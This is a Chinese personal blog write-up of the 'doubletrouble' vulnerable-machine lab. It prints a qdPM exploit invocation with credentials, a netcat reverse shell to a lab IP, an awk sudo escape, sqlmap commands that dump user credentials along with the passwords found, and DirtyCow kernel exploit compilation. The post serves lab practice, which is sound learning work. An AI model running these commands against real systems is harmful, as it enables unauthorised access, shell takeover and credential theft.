扫描打点

朴实无华的端口:

qdpm9.1,搜了一下一大把poc,但因为没登陆一个都不能用扫一下网站目录:

去
secret里面找到张图片,佬提示我们是隐写stegseek爆破一下:
里面的账密可以登录:
拿
shellsearchspploit搜一下poc:
python 50944.py -url http://192.168.56.107/ -u otisrush@localhost.com -p otis666
可以命令执行,那么直接反弹
shellcmd=nc -e /bin/bash 192.168.56.101 443提权
sudo -l
直接出了,准备
awk提权sudo awk 'BEGIN {system("/bin/sh")}'
然后去
root文件夹下找到另一个靶机,进二阶段:
二阶段
靶机上
python3开服务器用kaliwget扫描打点

注意这个内核
这个网站
dirsearch没东西sqlmap扫出来时间盲注
打一下:
sqlmap -r sql.txt --batch -dbs
sqlmap -r sql.txt --batch -D doubletrouble --tables
sqlmap -r sql.txt --batch -D doubletrouble -T users --dump
拿到两个账密:
montreux:GfsZxc1clapton:ZubZub99发现这两个都不能登录网站,而第二个可以登
ssh内核提取

sudo -l不让find / -perm -u=s -type f 2>/dev/null
没什么奇怪的东西
ps aux没看出来qwq
uname -aLinux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux3.2的内核,佬教我们老的内核一般可以拿脏牛dirtycow来提权还是传上去,然后:
1
2
3gcc -pthread dirtycow.c -o dirty -lcrypt
./dirty
root经过漫长的等待;


学长的任务罢了7-doubletrouble
- 本文链接: http://noone40404.github.io/2024/10/13/学长的任务罢了7:doubletrouble/
 - 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!